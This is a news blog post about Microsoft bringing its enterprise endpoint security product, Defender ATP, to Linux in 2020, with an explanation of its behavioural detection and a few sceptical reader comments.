Microsoft Defender ATP is Coming to Linux! What Does it Mean?

Microsoft has announced that it is bringing its enterprise security product Microsoft Defender Advanced Threat Protection (ATP) to Linux in 2020.

Microsoft’s annual developer conference Microsoft Ignite has just been concluded and there are a few important announcements that relate to Linux. You probably already read about Microsoft bringing its Edge web browser to Linux. The next big news is that Microsoft is bringing Microsoft Defender ATP to Linux.

Let’s get into some details what it is and why Microsoft is bothering itself to develop something for Linux.

What is Microsoft Defender ATP?

If you have used Windows in past few years, you must have come across Windows Defender. It is basically an antivirus product by Microsoft that brings some level of security by detecting viruses and malware.

Microsoft improved this functionality for its enterprise users by introducing Windows Defender ATP (Advanced Threat Protection). Defender ATP works on behavioral analysis. It collects usage data and store them on the same system. However, when it notices an inconsistent behavior, it sends the data to Azure service (Microsoft’s cloud service). In here, it will have a collection of behavioral data and the anomalies.

For example, if you got a PDF attachment in the email, you open it and it opened a command prompt, Defender ATP will notice this abnormal behavior. I recommend reading this article to learn more about the difference between Defender and Defender ATP.

Now this is entirely an enterprise product. In a big enterprise with hundreds or thousands of end points (computers), Defender ATP provides a good layer of protection. The IT admins will have a centralized view of the end-points on their Azure instance and the threats can be analyzed and actions can be taken accordingly.

Microsoft Defender ATP for Linux (and Mac)

Normally, enterprises have Windows on their computer but Mac and Linux are also getting popular specially among the developers. In an environment where there is a mix of Mac and Linux machines among Windows, Defender ATP has to extends its services to these operating systems so that it can provide a holistic defense to all the devices on the network.

Keeping that in mind, Microsoft first changed Windows Defender ATP to Microsoft Defender ATP in March 2019, signaling that the product is not limited to just Windows operating system.

Soon after it announced Defender ATP for Mac.

And now to cover all the major operating systems in an enterprise environment, Microsoft is bringing Defender ATP to Linux in 2020.

How Microsoft Defender ATP on Linux impacts you, a Linux user?

Since Defender ATP is an enterprise product, I don’t think you need to be bothered with this. Organizations need to secure their end-points against threats so it makes sense that Microsoft is improving its product to cover Linux as well.

For normal Linux users like you and me, it won’t make any difference. I am not going to use it ‘secure’ my three Linux systems and pay Microsoft for that.

Please feel free to share your opinion on Microsoft bringing Defender ATP to Linux in the comment section.

Similar Posts

  • Well, I guess it’s a lot easier to port Windows Defender to Linux than to fix Win10 update bughell.

  • this will cause lack of personal privacy of our own system now microsoft needs to take control of linux domain and privacy of its users through legal entrance

    • perhaps, but it gets worse. They didn’t move their assets correctly, their system needs a massive more help, not only that, they don’t specialize in Linux and truly don’t know the capabilities of it. How can they protect something they don’t know well when they can’t protect their own inefficient code good enough?

  • If they open sourced it, someone might use it. I would not trust Microsoft’s word that they have my security as the number one goal.